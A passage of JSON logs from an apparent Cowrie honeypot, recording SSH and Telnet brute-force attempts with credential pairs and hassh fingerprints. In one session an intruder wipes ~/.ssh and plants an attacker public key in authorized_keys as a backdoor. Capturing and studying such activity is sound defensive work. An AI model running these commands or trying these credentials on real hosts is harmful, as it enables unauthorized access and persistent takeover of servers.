\\xe1\\xf0\\x1f\\xd6y\\x89?\\x17o\\xe0!b\\xf1\\x0c\\xbe\\xf2\\x1c\\xb1J\\x0eP#\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.208.100:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xcde\\x99\\xdc\\xa4};\\x16f\\xb4\\xa67\\x16{c\\x9b\\x01/^1'\\xc2.q\\x81\\xd6A\\xb5%m\\xff| \\xc1\\x8c>&\\x0c\\xf1\\t*\\xa4?\\x81\\x00\\xeb^\\x97\\xd2.\\xb4\\xc7\\x88\\xf5vD\\xb3\\xbd0\\x1e\\x90r~\\tc\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 #%^\\x96\\xd79\\xdda> \\xe1\\xf0\\x1f\\xd6y\\x89?\\x17o\\xe0!b\\xf1\\x0c\\xbe\\xf2\\x1c\\xb1J\\x0eP#\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T13:17:58.253446Z","src_ip":"212.227.235.229","session":"ea47b1418c7d"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:58.359404Z","src_ip":"212.227.235.229","session":"ea47b1418c7d"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":33270,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddedf4ba3a56","protocol":"ssh","message":"New connection: 93.123.109.189:33270 (1.2.3.4:22) [session: ddedf4ba3a56]","sensor":"my-vps","timestamp":"2025-08-26T13:17:58.877332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:17:58.878102Z","src_ip":"93.123.109.189","session":"ddedf4ba3a56"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:17:58.897619Z","src_ip":"93.123.109.189","session":"ddedf4ba3a56"}
{"eventid":"cowrie.login.failed","username":"tfsc","password":"1234","message":"login attempt [tfsc/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:17:58.957162Z","src_ip":"93.123.109.189","session":"ddedf4ba3a56"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:18:00.046364Z","src_ip":"93.123.109.189","session":"ddedf4ba3a56"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":57772,"dst_ip":"1.2.3.4","dst_port":23,"session":"8fe75779d355","protocol":"telnet","message":"New connection: 176.65.149.186:57772 (1.2.3.4:23) [session: 8fe75779d355]","sensor":"my-vps","timestamp":"2025-08-26T13:18:14.033693Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:18:14.072331Z","src_ip":"176.65.149.186","session":"8fe75779d355"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:18:14.152823Z","src_ip":"176.65.149.186","session":"8fe75779d355"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T13:18:14.153998Z","src_ip":"176.65.149.186","session":"8fe75779d355"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T13:18:14.154801Z","src_ip":"176.65.149.186","session":"8fe75779d355"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53238,"dst_ip":"1.2.3.4","dst_port":22,"session":"1aa8eb6c767f","protocol":"ssh","message":"New connection: 212.227.235.229:53238 (1.2.3.4:22) [session: 1aa8eb6c767f]","sensor":"my-vps","timestamp":"2025-08-26T13:18:20.263301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:18:20.264182Z","src_ip":"212.227.235.229","session":"1aa8eb6c767f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:18:20.505534Z","src_ip":"212.227.235.229","session":"1aa8eb6c767f"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"qweasd123","message":"login attempt [ubuntu/qweasd123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:18:21.510016Z","src_ip":"212.227.235.229","session":"1aa8eb6c767f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:18:22.753704Z","src_ip":"212.227.235.229","session":"1aa8eb6c767f"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:18:33.264922Z","src_ip":"212.227.125.160","session":"c90d02065f56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55548,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9687dbf072f","protocol":"ssh","message":"New connection: 212.227.235.229:55548 (1.2.3.4:22) [session: f9687dbf072f]","sensor":"my-vps","timestamp":"2025-08-26T13:18:53.288421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:18:53.290148Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:18:54.510535Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.login.success","username":"root","password":"Azerty123@","message":"login attempt [root/Azerty123@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:18:55.254091Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:18:55.765896Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:18:55.766553Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:18:55.767428Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:18:56.015834Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:18:57.140140Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:18:57.140844Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:18:57.390950Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:18:57.391973Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55550,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccd3fcb6bfce","protocol":"ssh","message":"New connection: 212.227.235.229:55550 (1.2.3.4:22) [session: ccd3fcb6bfce]","sensor":"my-vps","timestamp":"2025-08-26T13:18:57.635889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:18:57.636592Z","src_ip":"212.227.235.229","session":"ccd3fcb6bfce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:18:59.576971Z","src_ip":"212.227.235.229","session":"ccd3fcb6bfce"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:19:00.312449Z","src_ip":"212.227.235.229","session":"ccd3fcb6bfce"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:01.560070Z","src_ip":"212.227.235.229","session":"ccd3fcb6bfce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55552,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fd3b414f732","protocol":"ssh","message":"New connection: 212.227.235.229:55552 (1.2.3.4:22) [session: 3fd3b414f732]","sensor":"my-vps","timestamp":"2025-08-26T13:19:01.805328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:19:01.806293Z","src_ip":"212.227.235.229","session":"3fd3b414f732"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:19:03.022639Z","src_ip":"212.227.235.229","session":"3fd3b414f732"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:19:03.766116Z","src_ip":"212.227.235.229","session":"3fd3b414f732"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:04.015765Z","src_ip":"212.227.235.229","session":"f9687dbf072f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:04.016738Z","src_ip":"212.227.235.229","session":"3fd3b414f732"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:32.023215Z","src_ip":"212.227.235.229","session":"49eecc5f9883"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46324,"dst_ip":"1.2.3.4","dst_port":22,"session":"3168f82beed7","protocol":"ssh","message":"New connection: 212.227.235.229:46324 (1.2.3.4:22) [session: 3168f82beed7]","sensor":"my-vps","timestamp":"2025-08-26T13:19:33.542380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:19:33.543305Z","src_ip":"212.227.235.229","session":"3168f82beed7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:19:33.786616Z","src_ip":"212.227.235.229","session":"3168f82beed7"}
{"eventid":"cowrie.login.failed","username":"ftp_user","password":"123456","message":"login attempt [ftp_user/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:19:34.799510Z","src_ip":"212.227.235.229","session":"3168f82beed7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:36.045484Z","src_ip":"212.227.235.229","session":"3168f82beed7"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":52380,"dst_ip":"1.2.3.4","dst_port":22,"session":"28686e8ae080","protocol":"ssh","message":"New connection: 45.88.8.186:52380 (1.2.3.4:22) [session: 28686e8ae080]","sensor":"my-vps","timestamp":"2025-08-26T13:19:38.254475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:19:38.964910Z","src_ip":"45.88.8.186","session":"28686e8ae080"}
